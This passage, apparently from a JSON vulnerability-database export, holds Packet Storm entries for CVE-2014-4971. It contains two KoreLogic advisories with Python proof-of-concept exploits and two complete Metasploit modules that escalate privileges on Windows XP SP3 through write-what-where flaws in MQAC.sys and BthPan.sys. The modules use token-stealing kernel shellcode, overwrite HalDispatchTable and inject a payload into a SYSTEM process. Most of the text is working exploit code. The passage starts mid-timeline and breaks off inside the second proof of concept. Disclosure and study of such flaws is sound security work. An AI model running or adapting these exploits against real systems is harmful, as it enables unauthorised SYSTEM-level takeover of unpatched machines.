- MITRE deems this vulnerability (KL-001-2014-003) to \nbe identical to KL-001-2014-002 and issues \nCVE-2014-4971 for both vulnerabilities. \n2014.07.18 - Public disclosure. \n \n7. 
Proof of Concept \n \n#!/usr/bin/python2 \n# \n# KL-001-2014-003 : Microsoft XP SP3 MQAC.sys Arbitrary Write Privilege Escalation \n# Matt Bergin (KoreLogic / Smash the Stack) \n# CVE-2014-4971 \n# \nfrom ctypes import * \nfrom struct import pack \nfrom os import getpid,system \nfrom sys import exit \nEnumDeviceDrivers,GetDeviceDriverBaseNameA,CreateFileA,NtAllocateVirtualMemory,WriteProcessMemory,LoadLibraryExA = windll.Psapi.EnumDeviceDrivers,windll.Psapi.GetDeviceDriverBaseNameA,windll.kernel32.CreateFileA,windll.ntdll.NtAllocateVirtualMemory,windll.kernel32.WriteProcessMemory,windll.kernel32.LoadLibraryExA \nGetProcAddress,DeviceIoControlFile,NtQueryIntervalProfile,CloseHandle = windll.kernel32.GetProcAddress,windll.ntdll.ZwDeviceIoControlFile,windll.ntdll.NtQueryIntervalProfile,windll.kernel32.CloseHandle \nINVALID_HANDLE_VALUE,FILE_SHARE_READ,FILE_SHARE_WRITE,OPEN_EXISTING,NULL = -1,2,1,3,0 \n \n# thanks to offsec for the concept \n# I re-wrote the code as to not fully insult them :) \ndef getBase(name=None): \nretArray = c_ulong*1024 \nImageBase = retArray() \ncallback = c_int(1024) \ncbNeeded = c_long() \nEnumDeviceDrivers(byref(ImageBase),callback,byref(cbNeeded)) \nfor base in ImageBase: \ndriverName = c_char_p(\"\\x00\"*1024) \nGetDeviceDriverBaseNameA(base,driverName,48) \nif (name): \nif (driverName.value.lower() == name): \nreturn base \nelse: \nreturn (base,driverName.value) \nreturn None \n \nhandle = CreateFileA(\"\\\\\\\\.\\\\MQAC\",FILE_SHARE_WRITE|FILE_SHARE_READ,0,None,OPEN_EXISTING,0,None) \nprint \"[+] Handle \\\\\\\\.\\\\MQAC @ %s\" % (handle) \nNtAllocateVirtualMemory(-1,byref(c_int(0x1)),0x0,byref(c_int(0xffff)),0x1000|0x2000,0x40) \nbuf = \"\\x50\\x00\\x00\\x00\"+\"\\x90\"*0x400 \nWriteProcessMemory(-1, 0x1, \"\\x90\"*0x6000, 0x6000, byref(c_int(0))) \nWriteProcessMemory(-1, 0x1, buf, 0x400, byref(c_int(0))) \nWriteProcessMemory(-1, 0x5000, \"\\xcc\", 77, byref(c_int(0))) \n#Overwrite Pointer \nkBase,kVer = getBase() \nhKernel = 
LoadLibraryExA(kVer,0,1) \nHalDispatchTable = GetProcAddress(hKernel,\"HalDispatchTable\") \nHalDispatchTable -= hKernel \nHalDispatchTable += kBase \nHalDispatchTable += 0x4 \nprint \"[+] Kernel @ %s, HalDispatchTable @ %s\" % (hex(kBase),hex(HalDispatchTable)) \nDeviceIoControlFile(handle,NULL,NULL,NULL,byref(c_ulong(8)),0x1965020f,0x1,0x258,HalDispatchTable,0) \nprint \"[+] HalDispatchTable+0x4 overwritten\" \nCloseHandle(handle) \nNtQueryIntervalProfile(c_ulong(2),byref(c_ulong())) \nexit(0) \n \nThe contents of this advisory are copyright(c) 2014 \nKoreLogic, Inc. and are licensed under a Creative Commons \nAttribution Share-Alike 4.0 (United States) License: \nhttp://creativecommons.org/licenses/by-sa/4.0/ \n \nKoreLogic, Inc. is a founder-owned and operated company with a \nproven track record of providing security services to entities \nranging from Fortune 500 to small and mid-sized companies. We \nare a highly skilled team of senior security consultants doing \nby-hand security assessments for the most important networks in \nthe U.S. and around the world. We are also developers of various \ntools and resources aimed at helping the security community. 
\nhttps://www.korelogic.com/about-korelogic.html \n \nOur public vulnerability disclosure policy is available at: \nhttps://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v1.0.txt \n \n`\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/127536/KL-001-2014-003.txt"}, {"lastseen": "2016-12-05T22:15:02", "description": "", "published": "2014-07-25T00:00:00", "type": "packetstorm", "title": "MQAC.sys Arbitrary Write Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-4971"], "modified": "2014-07-25T00:00:00", "id": "PACKETSTORM:127618", "href": "https://packetstormsecurity.com/files/127618/MQAC.sys-Arbitrary-Write-Privilege-Escalation.html", "sourceData": "`## \n# This module requires Metasploit: http//metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'msf/core' \nrequire 'rex' \n \nclass Metasploit3 < Msf::Exploit::Local \nRank = AverageRanking \n \ninclude Msf::Post::Windows::Priv \ninclude Msf::Post::Windows::Process \n \ndef initialize(info={}) \nsuper(update_info(info, { \n'Name' => 'MQAC.sys Arbitrary Write Privilege Escalation', \n'Description' => %q{ \nA vulnerability within the MQAC.sys module allows an attacker to \noverwrite an arbitrary location in kernel memory. \n \nThis module will elevate itself to SYSTEM, then inject the payload \ninto another SYSTEM process. 
\n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'Matt Bergin', # original exploit and all the hard work \n'Spencer McIntyre' # MSF module \n], \n'Arch' => [ ARCH_X86 ], \n'Platform' => [ 'win' ], \n'SessionTypes' => [ 'meterpreter' ], \n'DefaultOptions' => \n{ \n'EXITFUNC' => 'thread', \n}, \n'Targets' => \n[ \n[ 'Windows XP SP3', \n{ \n'_KPROCESS' => \"\\x44\", \n'_TOKEN' => \"\\xc8\", \n'_UPID' => \"\\x84\", \n'_APLINKS' => \"\\x88\" \n} \n], \n], \n'References' => \n[ \n[ 'CVE', '2014-4971' ], \n[ 'EDB', '34112' ], \n[ 'URL', 'https://www.korelogic.com/Resources/Advisories/KL-001-2014-003.txt' ] \n], \n'DisclosureDate'=> 'Jul 22 2014', \n'DefaultTarget' => 0 \n})) \nend \n \ndef find_sys_base(drvname) \nsession.railgun.add_dll('psapi') if not session.railgun.dlls.keys.include?('psapi') \nsession.railgun.add_function('psapi', 'EnumDeviceDrivers', 'BOOL', [ [\"PBLOB\", \"lpImageBase\", \"out\"], [\"DWORD\", \"cb\", \"in\"], [\"PDWORD\", \"lpcbNeeded\", \"out\"]]) \nsession.railgun.add_function('psapi', 'GetDeviceDriverBaseNameA', 'DWORD', [ [\"LPVOID\", \"ImageBase\", \"in\"], [\"PBLOB\", \"lpBaseName\", \"out\"], [\"DWORD\", \"nSize\", \"in\"]]) \nresults = session.railgun.psapi.EnumDeviceDrivers(4096, 1024, 4) \naddresses = results['lpImageBase'][0..results['lpcbNeeded'] - 1].unpack(\"L*\") \n \naddresses.each do |address| \nresults = session.railgun.psapi.GetDeviceDriverBaseNameA(address, 48, 48) \ncurrent_drvname = results['lpBaseName'][0..results['return'] - 1] \nif drvname == nil \nif current_drvname.downcase.include?('krnl') \nreturn [address, current_drvname] \nend \nelsif drvname == results['lpBaseName'][0..results['return'] - 1] \nreturn [address, current_drvname] \nend \nend \nend \n \n# Function borrowed from smart_hashdump \ndef get_system_proc \n# Make sure you got the correct SYSTEM Account Name no matter the OS Language \nlocal_sys = resolve_sid(\"S-1-5-18\") \nsystem_account_name = \"#{local_sys[:domain]}\\\\#{local_sys[:name]}\" \n 
\nthis_pid = session.sys.process.getpid \n# Processes that can Blue Screen a host if migrated in to \ndangerous_processes = [\"lsass.exe\", \"csrss.exe\", \"smss.exe\"] \nsession.sys.process.processes.each do |p| \n# Check we are not migrating to a process that can BSOD the host \nnext if dangerous_processes.include?(p[\"name\"]) \nnext if p[\"pid\"] == this_pid \nnext if p[\"pid\"] == 4 \nnext if p[\"user\"] != system_account_name \nreturn p \nend \nend \n \ndef open_device \nhandle = session.railgun.kernel32.CreateFileA(\"\\\\\\\\.\\\\MQAC\", \"FILE_SHARE_WRITE|FILE_SHARE_READ\", 0, nil, \"OPEN_EXISTING\", 0, nil) \nif handle['return'] == 0 \nprint_error('Failed to open the \\\\\\\\.\\\\MQAC device') \nreturn nil \nend \nhandle = handle['return'] \nend \n \ndef check \nhandle = open_device \nif handle.nil? \nreturn Exploit::CheckCode::Safe \nend \nsession.railgun.kernel32.CloseHandle(handle) \n \nos = sysinfo[\"OS\"] \ncase os \nwhen /windows xp.*service pack 3/i \nreturn Exploit::CheckCode::Appears \nwhen /windows xp/i \nreturn Exploit::CheckCode::Detected \nelse \nreturn Exploit::CheckCode::Safe \nend \nend \n \ndef exploit \nif sysinfo[\"Architecture\"] =~ /wow64/i \nprint_error(\"Running against WOW64 is not supported\") \nreturn \nelsif sysinfo[\"Architecture\"] =~ /x64/ \nprint_error(\"Running against 64-bit systems is not supported\") \nreturn \nend \n \nif is_system? \nprint_error(\"This meterpreter session is already running as SYSTEM\") \nreturn \nend \n \nkernel_info = find_sys_base(nil) \nbase_addr = 0xffff \nprint_status(\"Kernel Base Address: 0x#{kernel_info[0].to_s(16)}\") \n \nhandle = open_device \nreturn if handle.nil? 
\n \nthis_proc = session.sys.process.open \nunless this_proc.memory.writable?(base_addr) \nsession.railgun.ntdll.NtAllocateVirtualMemory(-1, [ 1 ].pack(\"L\"), nil, [ 0xffff ].pack(\"L\"), \"MEM_COMMIT|MEM_RESERVE\", \"PAGE_EXECUTE_READWRITE\") \nend \nunless this_proc.memory.writable?(base_addr) \nprint_error('Failed to properly allocate memory') \nthis_proc.close \nreturn \nend \n \nhKernel = session.railgun.kernel32.LoadLibraryExA(kernel_info[1], 0, 1) \nhKernel = hKernel['return'] \nhalDispatchTable = session.railgun.kernel32.GetProcAddress(hKernel, \"HalDispatchTable\") \nhalDispatchTable = halDispatchTable['return'] \nhalDispatchTable -= hKernel \nhalDispatchTable += kernel_info[0] \nprint_status(\"HalDisPatchTable Address: 0x#{halDispatchTable.to_s(16)}\") \n \ntokenstealing = \"\\x52\" # push edx # Save edx on the stack \ntokenstealing << \"\\x53\" # push ebx # Save ebx on the stack \ntokenstealing << \"\\x33\\xc0\" # xor eax, eax # eax = 0 \ntokenstealing << \"\\x64\\x8b\\x80\\x24\\x01\\x00\\x00\" # mov eax, dword ptr fs:[eax+124h] # Retrieve ETHREAD \ntokenstealing << \"\\x8b\\x40\" + target['_KPROCESS'] # mov eax, dword ptr [eax+44h] # Retrieve _KPROCESS \ntokenstealing << \"\\x8b\\xc8\" # mov ecx, eax \ntokenstealing << \"\\x8b\\x98\" + target['_TOKEN'] + \"\\x00\\x00\\x00\" # mov ebx, dword ptr [eax+0C8h] # Retrieves TOKEN \ntokenstealing << \"\\x8b\\x80\" + target['_APLINKS'] + \"\\x00\\x00\\x00\" # mov eax, dword ptr [eax+88h] <====| # Retrieve FLINK from ActiveProcessLinks \ntokenstealing << \"\\x81\\xe8\" + target['_APLINKS'] + \"\\x00\\x00\\x00\" # sub eax,88h | # Retrieve _EPROCESS Pointer from the ActiveProcessLinks \ntokenstealing << \"\\x81\\xb8\" + target['_UPID'] + \"\\x00\\x00\\x00\\x04\\x00\\x00\\x00\" # cmp dword ptr [eax+84h], 4 | # Compares UniqueProcessId with 4 (The System Process on Windows XP) \ntokenstealing << \"\\x75\\xe8\" # jne 0000101e ====================== \ntokenstealing << \"\\x8b\\x90\" + target['_TOKEN'] + 
\"\\x00\\x00\\x00\" # mov edx,dword ptr [eax+0C8h] # Retrieves TOKEN and stores on EDX \ntokenstealing << \"\\x8b\\xc1\" # mov eax, ecx # Retrieves KPROCESS stored on ECX \ntokenstealing << \"\\x89\\x90\" + target['_TOKEN'] + \"\\x00\\x00\\x00\" # mov dword ptr [eax+0C8h],edx # Overwrites the TOKEN for the current KPROCESS \ntokenstealing << \"\\x5b\" # pop ebx # Restores ebx \ntokenstealing << \"\\x5a\" # pop edx # Restores edx \ntokenstealing << \"\\xc2\\x10\" # ret 10h # Away from the kernel! \n \nshellcode = make_nops(0x200) + tokenstealing \nthis_proc.memory.write(0x1, shellcode) \nthis_proc.close \n \nprint_status(\"Triggering vulnerable IOCTL\") \nsession.railgun.ntdll.NtDeviceIoControlFile(handle, 0, 0, 0, 4, 0x1965020f, 1, 0x258, halDispatchTable + 0x4, 0) \nresult = session.railgun.ntdll.NtQueryIntervalProfile(1337, 4) \n \nunless is_system? \nprint_error(\"Exploit failed\") \nreturn \nend \n \nproc = get_system_proc \nprint_status(\"Injecting the payload into SYSTEM process: #{proc['name']}\") \nunless execute_shellcode(payload.encoded, nil, proc['pid']) \nfail_with(Failure::Unknown, \"Error while executing the payload\") \nend \nend \n \nend \n`\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/127618/mqac_write.rb.txt"}, {"lastseen": "2016-12-05T22:19:55", "description": "", "published": "2014-10-15T00:00:00", "type": "packetstorm", "title": "Microsoft Bluetooth Personal Area Networking (BthPan.sys) Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-4971"], "modified": "2014-10-15T00:00:00", "id": "PACKETSTORM:128674", "href": "https://packetstormsecurity.com/files/128674/Microsoft-Bluetooth-Personal-Area-Networking-BthPan.sys-Privilege-Escalation.html", "sourceData": "`## \n# This module requires Metasploit: http//metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n 
\nrequire 'msf/core' \nrequire 'msf/core/exploit/local/windows_kernel' \nrequire 'rex' \n \nclass Metasploit3 < Msf::Exploit::Local \nRank = AverageRanking \n \ninclude Msf::Exploit::Local::WindowsKernel \ninclude Msf::Post::File \ninclude Msf::Post::Windows::FileInfo \ninclude Msf::Post::Windows::Priv \ninclude Msf::Post::Windows::Process \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Microsoft Bluetooth Personal Area Networking (BthPan.sys) Privilege Escalation', \n'Description' => %q{ \nA vulnerability within Microsoft Bluetooth Personal Area Networking module, \nBthPan.sys, can allow an attacker to inject memory controlled by the attacker \ninto an arbitrary location. This can be used by an attacker to overwrite \nHalDispatchTable+0x4 and execute arbitrary code by subsequently calling \nNtQueryIntervalProfile. \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'Matt Bergin <level[at]korelogic.com>', # Vulnerability discovery and PoC \n'Jay Smith <jsmith[at]korelogic.com>' # MSF module \n], \n'Arch' => ARCH_X86, \n'Platform' => 'win', \n'SessionTypes' => [ 'meterpreter' ], \n'DefaultOptions' => \n{ \n'EXITFUNC' => 'thread' \n}, \n'Targets' => \n[ \n['Windows XP SP3', \n{ \n'HaliQuerySystemInfo' => 0x16bba, \n'_KPROCESS' => \"\\x44\", \n'_TOKEN' => \"\\xc8\", \n'_UPID' => \"\\x84\", \n'_APLINKS' => \"\\x88\" \n} \n] \n], \n'References' => \n[ \n[ 'CVE', '2014-4971' ], \n[ 'URL', 'https://www.korelogic.com/Resources/Advisories/KL-001-2014-002.txt' ], \n[ 'OSVDB', '109387' ] \n], \n'DisclosureDate' => 'Jul 18 2014', \n'DefaultTarget' => 0 \n)) \nend \n \n \ndef ring0_shellcode \ntokenswap = \"\\x60\\x64\\xA1\\x24\\x01\\x00\\x00\" \ntokenswap << \"\\x8B\\x40\\x44\\x50\\xBB\\x04\" \ntokenswap << \"\\x00\\x00\\x00\\x8B\\x80\\x88\" \ntokenswap << \"\\x00\\x00\\x00\\x2D\\x88\" \ntokenswap << \"\\x00\\x00\\x00\\x39\\x98\\x84\" \ntokenswap << \"\\x00\\x00\\x00\\x75\\xED\\x8B\\xB8\\xC8\" \ntokenswap << \"\\x00\\x00\\x00\\x83\\xE7\\xF8\\x58\\xBB\" 
\ntokenswap << [session.sys.process.getpid].pack('V') \ntokenswap << \"\\x8B\\x80\\x88\\x00\\x00\\x00\" \ntokenswap << \"\\x2D\\x88\\x00\\x00\\x00\" \ntokenswap << \"\\x39\\x98\\x84\\x00\\x00\\x00\" \ntokenswap << \"\\x75\\xED\\x89\\xB8\\xC8\" \ntokenswap << \"\\x00\\x00\\x00\\x61\\xC3\" \nend \n \ndef fill_memory(proc, address, length, content) \nsession.railgun.ntdll.NtAllocateVirtualMemory(-1, [ address ].pack('V'), nil, [ length ].pack('V'), \"MEM_RESERVE|MEM_COMMIT|MEM_TOP_DOWN\", \"PAGE_EXECUTE_READWRITE\") \n \nunless proc.memory.writable?(address) \nvprint_error(\"Failed to allocate memory\") \nreturn nil \nend \nvprint_good(\"#{address} is now writable\") \n \nresult = proc.memory.write(address, content) \n \nif result.nil? \nvprint_error(\"Failed to write contents to memory\") \nreturn nil \nend \nvprint_good(\"Contents successfully written to 0x#{address.to_s(16)}\") \n \nreturn address \nend \n \ndef disclose_addresses(t) \naddresses = {} \n \nhal_dispatch_table = find_haldispatchtable \nreturn nil if hal_dispatch_table.nil? \naddresses['halDispatchTable'] = hal_dispatch_table \nvprint_good(\"HalDispatchTable found at 0x#{addresses['halDispatchTable'].to_s(16)}\") \n \nvprint_status('Getting the hal.dll base address...') \nhal_info = find_sys_base('hal.dll') \nif hal_info.nil? 
\nvprint_error('Failed to disclose hal.dll base address') \nreturn nil \nend \nhal_base = hal_info[0] \nvprint_good(\"hal.dll base address disclosed at 0x#{hal_base.to_s(16)}\") \n \nhali_query_system_information = hal_base + t['HaliQuerySystemInfo'] \naddresses['HaliQuerySystemInfo'] = hali_query_system_information \n \nvprint_good(\"HaliQuerySystemInfo address disclosed at 0x#{addresses['HaliQuerySystemInfo'].to_s(16)}\") \naddresses \nend \n \ndef check \nif sysinfo[\"Architecture\"] =~ /wow64/i || sysinfo[\"Architecture\"] =~ /x64/ \nreturn Exploit::CheckCode::Safe \nend \n \nos = sysinfo[\"OS\"] \nreturn Exploit::CheckCode::Safe unless os =~ /windows xp.*service pack 3/i \n \nhandle = open_device(\"\\\\\\\\.\\\\bthpan\", 'FILE_SHARE_WRITE|FILE_SHARE_READ', 0, 'OPEN_EXISTING') \nreturn Exploit::CheckCode::Safe unless handle \n \nsession.railgun.kernel32.CloseHandle(handle) \n \nreturn Exploit::CheckCode::Vulnerable \nend \n \ndef exploit \nif is_system? \nfail_with(Exploit::Failure::None, 'Session is already elevated') \nend \n \nunless check == Exploit::CheckCode::Vulnerable \nfail_with(Exploit::Failure::NotVulnerable, \"Exploit not available on this system\") \nend \n \nhandle = open_device(\"\\\\\\\\.\\\\bthpan\", 'FILE_SHARE_WRITE|FILE_SHARE_READ', 0, 'OPEN_EXISTING') \nif handle.nil? \nfail_with(Failure::NoTarget, \"Unable to open \\\\\\\\.\\\\bthpan device\") \nend \n \nmy_target = targets[0] \nprint_status(\"Disclosing the HalDispatchTable address...\") \n@addresses = disclose_addresses(my_target) \nif @addresses.nil? \nsession.railgun.kernel32.CloseHandle(handle) \nfail_with(Failure::Unknown, \"Failed to disclose necessary address for exploitation. 
Aborting.\") \nelse \nprint_good(\"Address successfully disclosed.\") \nend \n \nprint_status(\"Storing the shellcode in memory...\") \nthis_proc = session.sys.process.open \nkernel_shell = ring0_shellcode \nkernel_shell_address = 0x1 \n \nbuf = \"\\x90\" * 0x6000 \nbuf[0, 1028] = \"\\x50\\x00\\x00\\x00\" + \"\\x90\" * 0x400 \nbuf[0x5000, kernel_shell.length] = kernel_shell \n \nresult = fill_memory(this_proc, kernel_shell_address, buf.length, buf) \nif result.nil? \nsession.railgun.kernel32.CloseHandle(handle) \nfail_with(Failure::Unknown, \"Error while storing the kernel stager shellcode on memory\") \nend \nprint_good(\"Kernel stager successfully stored at 0x#{kernel_shell_address.to_s(16)}\") \n \nprint_status(\"Triggering the vulnerability, corrupting the HalDispatchTable...\") \nsession.railgun.ntdll.NtDeviceIoControlFile(handle, nil, nil, nil, 4, 0x0012d814, 0x1, 0x258, @addresses[\"halDispatchTable\"] + 0x4, 0) \nsession.railgun.kernel32.CloseHandle(handle) \n \nprint_status(\"Executing the Kernel Stager throw NtQueryIntervalProfile()...\") \nsession.railgun.ntdll.NtQueryIntervalProfile(2, 4) \n \nprint_status(\"Checking privileges after exploitation...\") \n \nunless is_system? 
\nfail_with(Failure::Unknown, \"The privilege escalation wasn't successful\") \nend \nprint_good(\"Privilege escalation successful!\") \n \np = payload.encoded \nprint_status(\"Injecting #{p.length} bytes to memory and executing it...\") \nunless execute_shellcode(p) \nfail_with(Failure::Unknown, \"Error while executing the payload\") \nend \nend \nend \n \n`\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/128674/bthpan.rb.txt"}, {"lastseen": "2016-12-05T22:14:08", "description": "", "published": "2014-07-21T00:00:00", "type": "packetstorm", "title": "Microsoft XP SP3 BthPan.sys Arbitrary Write Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-4971"], "modified": "2014-07-21T00:00:00", "id": "PACKETSTORM:127535", "href": "https://packetstormsecurity.com/files/127535/Microsoft-XP-SP3-BthPan.sys-Arbitrary-Write-Privilege-Escalation.html", "sourceData": "`Title: Microsoft XP SP3 BthPan.sys Arbitrary Write Privilege Escalation \nAdvisory ID: KL-001-2014-002 \nPublication Date: 2014-07-18 \nPublication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2014-002.txt \n \n \n1. Vulnerability Details \n \nAffected Vendor: Microsoft \nAffected Product: Bluetooth Personal Area Networking \nAffected Versions: 5.1.2600.5512 \nPlatform: Microsoft Windows XP SP3 \nCWE Classification: CWE-123: Write-what-where Condition \nImpact: Privilege Escalation \nAttack vector: IOCTL \nCVE ID: CVE-2014-4971 \n \n2. Vulnerability Description \n \nA vulnerability within the BthPan module allows an attacker to \ninject memory they control into an arbitrary location they \ndefine. This can be used by an attacker to overwrite \nHalDispatchTable+0x4 and execute arbitrary code by subsequently \ncalling NtQueryIntervalProfile. \n \n3. 
Technical Description \n \nA userland process can create a handle into the BthPan device \nand subsequently make DeviceIoControlFile() calls into that \ndevice. During the IRP handler routine for 0x0012b814 the user \nprovided OutputBuffer address is not validated. This allows an \nattacker to specify an arbitrary address and write \n(or overwrite) the memory residing at the specified address. \nThis is classicaly known as a write-what-where vulnerability and \nhas well known exploitation methods associated with it. \n \nA stack trace from our fuzzing can be seen below. In our fuzzing \ntestcase, the specified OutputBuffer in the DeviceIoControlFile() \ncall is 0xffff0000. \n \nSTACK_TEXT: \nb1e065b8 8051cc7f 00000050 ffff0000 00000001 nt!KeBugCheckEx+0x1b \nb1e06618 805405d4 00000001 ffff0000 00000000 nt!MmAccessFault+0x8e7 \nb1e06618 804f3b76 00000001 ffff0000 00000000 nt!KiTrap0E+0xcc \nb1e066e8 804fdaf1 8216cc80 b1e06734 b1e06728 nt!IopCompleteRequest+0x92 \nb1e06738 80541890 00000000 00000000 00000000 nt!KiDeliverApc+0xb3 \nb1e06758 804fb4a7 8055b1c0 81bdeda8 b1e0677c nt!KiUnlockDispatcherDatabase+0xa8 \nb1e06768 80534b09 8055b1c0 81f7a290 81f016b8 nt!KeInsertQueue+0x25 \nb1e0677c f83e26ec 81f7a290 00000000 b1e067a8 nt!ExQueueWorkItem+0x1b \nb1e0678c b272b5a1 81f7a288 00000000 81e002d8 NDIS!NdisScheduleWorkItem+0x21 \nb1e067a8 b273a544 b1e067c8 b273a30e 8216cc40 bthpan!BthpanReqAdd+0x16b \nb1e069e8 b273a62b 8216cc40 00000258 81e6f550 bthpan!IoctlDispatchDeviceControl+0x1a8 \nb1e06a00 f83e94bb 81e6f550 8216cc40 81d74d68 bthpan!IoctlDispatchMajor+0x93 \nb1e06a18 f83e9949 81e6f550 8216cc40 8217e6e8 NDIS!ndisDummyIrpHandler+0x48 \nb1e06ab4 804ee129 81e6f550 8216cc40 806d32d0 NDIS!ndisDeviceControlIrpHandler+0x5c \nb1e06ac4 80574e56 8216ccb0 81d74d68 8216cc40 nt!IopfCallDriver+0x31 \nb1e06ad8 80575d11 81e6f550 8216cc40 81d74d68 nt!IopSynchronousServiceTail+0x70 \nb1e06b80 8056e57c 000006a8 00000000 00000000 nt!IopXxxControlFile+0x5e7 \nb1e06bb4 b1a2506f 000006a8 
00000000 00000000 nt!NtDeviceIoControlFile+0x2a \nWARNING: Stack unwind information not available. Following frames may be wrong. \n \nReviewing the FOLLOWUP_IP value from the WinDBG '!analyze -v' \ncommand shows the fault originating in the bthpan driver. \n \nFOLLOWUP_IP: \nbthpan!BthpanReqAdd+16b \nb272b5a1 ebc2 jmp bthpan!BthpanReqAdd+0x12f (b272b565) \n \nReviewing the TRAP_FRAME at the time of crash we can see \nIopCompleteRequest() copying data from InputBuffer into the \nOutputBuffer. InputBuffer is another parameter provided to the \nDeviceIoControlFile() function and is therefore controllable by \nthe attacker. The edi register contains the invalid address \nprovided during the fuzz testcase. \n \nTRAP_FRAME: b1e06630 -- (.trap 0xffffffffb1e06630) \nErrCode = 00000002 \neax=0000006a ebx=8216cc40 ecx=0000001a edx=00000001 esi=81e002d8 edi=ffff0000 \neip=804f3b76 esp=b1e066a4 ebp=b1e066e8 iopl=0 nv up ei pl nz na po cy \ncs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010203 \nnt!IopCompleteRequest+0x92: \n804f3b76 f3a5 rep movs dword ptr es:[edi],dword ptr [esi] \n \nA write-what-where vulnerability can be leveraged to obtain \nescalated privileges. To do so, an attacker will need to \nallocate memory in userland that is populated with shellcode \ndesigned to find the Token for PID 4 (System) and then overwrite \nthe token for its own process. By leveraging the vulnerability \nin BthPan it is then possible to overwrite the pointer at \nHalDispatchTable+0x4 with a pointer to our shellcode. Calling \nNtQueryIntervalProfile() will subsequently call \nHalDispatchTable+0x4, execute our shellcode, and elevate the \nprivilege of the exploit process. \n \n4. Mitigation and Remediation Recommendation \n \nNone. A patch is not likely to be forthcoming from the vendor. \n \n5. Credit \n \nThis vulnerability was discovered by Matt Bergin of KoreLogic \nSecurity, Inc. \n \n6. Disclosure Timeline \n \n2014.04.28 - Initial contact; sent Microsoft report and PoC. 
\n2014.04.28 - Microsoft acknowledges receipt of vulnerability \nreport; states XP is no longer supported and asks if \nthe vulnerability affects other versions of Windows. \n2014.04.29 - KoreLogic asks Microsoft for clarification of their \nsupport policy for XP. \n2014.04.29 - Microsoft says XP-only vulnerabilities will not be \naddressed with patches. \n2014.04.29 - KoreLogic asks if Microsoft intends to address the \nvulnerability report. \n2014.04.29 - Microsoft opens case to investigate the impact of the \nvulnerability on non-XP systems. \n2014.05.06 - Microsoft asks again if this vulnerability affects \nnon-XP systems. \n2014.05.14 - KoreLogic informs Microsoft that the vulnerability \nreport is for XP and other Windows versions have not \nbeen examined. \n2014.06.11 - KoreLogic informs Microsoft that 30 business days have \npassed since vendor acknowledgement of the initial \nreport. KoreLogic requests CVE number for the \nvulnerability, if there is one. KoreLogic also \nrequests vendor's public identifier for the \nvulnerability along with the expected disclosure date. \n2014.06.11 - Microsoft informs KoreLogic that the vulnerability \ndoes not impact any \"up-platform\" products. Says they \nare investigating embedded platforms. Does not provide \nCVE number. \n2014.06.24 - Microsoft contacts KoreLogic to say that they confused \nthe report of this vulnerability with another and that \nthey cannot reproduce the described behavior. \nMicrosoft asks for an updated Proof-of-Concept, crash \ndumps or any further analysis of the vulnerability \nthat KoreLogic can provide. \n2014.06.25 - KoreLogic provides Microsoft with an updated \nProof-of-Concept which demonstrates using the \nvulnerability to spawn a system shell. \n2014.06.30 - KoreLogic asks Microsoft for confirmation of their \nreceipt of the updated PoC. Also requests that a CVE \nID be issued for this vulnerability. 
\n2014.07.02 - 45 business days have elapsed since Microsoft \nacknowledged receipt of the vulnerability report and \nPoC. \n2014.07.07 - KoreLogic requests CVE from MITRE. \n2014.07.18 - MITRE deems this vulnerability (KL-001-2014-002) to be \nidentical to KL-001-2014-003 and issues CVE-2014-4971 \nfor both vulnerabilities. \n2014.07.18 - Public disclosure. \n \n7. Proof of Concept \n \n#!/usr/bin/python2 \n# \n# KL-001-2014-002 : Microsoft XP SP3 BthPan.sys Arbitrary Write Privilege Escalation \n# Matt Bergin (KoreLogic / Smash the Stack) \n# CVE-2014-4971 \n# \nfrom ctypes import * \nfrom struct import pack \nfrom os import getpid,system \nfrom sys import exit \nEnumDeviceDrivers,GetDeviceDriverBaseNameA,CreateFileA,NtAllocateVirtualMemory,WriteProcessMemory,LoadLibraryExA = windll.Psapi.EnumDeviceDrivers,windll.Psapi.GetDeviceDriverBaseNameA,windll.kernel32.CreateFileA,windll.ntdll.NtAllocateVirtualMemory,windll.kernel32.WriteProcessMemory,windll.kernel32.LoadLibraryExA \nGetProcAddress,DeviceIoControlFile,NtQueryIntervalProfile,CloseHandle = windll.kernel32.GetProcAddress,windll.ntdll.ZwDeviceIoControlFile,windll.ntdll.NtQueryIntervalProfile,windll.kernel32.CloseHandle \nINVALID_HANDLE_VALUE,FILE_SHARE_READ,FILE_SHARE_WRITE,OPEN_EXISTING,NULL = -1,2,1,3,0 \n \n# thanks to offsec for the concept \n# I re-wrote the code as to not fully insult them :) \ndef getBase(name=None): \nretArray = c_ulong*1024 \nImageBase = retArray() \ncallback = c_int(1024) \ncbNeeded = c_long() \nEnumDeviceDrivers(byref(ImageBase),callback,byref(cbNeeded)) \nfor base in ImageBase: \ndriverName = c_char_p(\"\\x00\"*1024) \nGetDeviceDriverBaseNameA(base,driverName,48) \nif (name): \nif (driverName.value.lower() == name): \nreturn base \nelse: \nreturn (base,driverName.value) \nreturn None \n \nhandle = CreateFileA(\"\\\\\\\\.\\\\BthPan\",FILE_SHARE_WRITE|FILE_SHARE_READ,0,None,OPEN_EXISTING,0,None) \nif (handle == INVALID_HANDLE_VALUE): \nprint \"[!] 
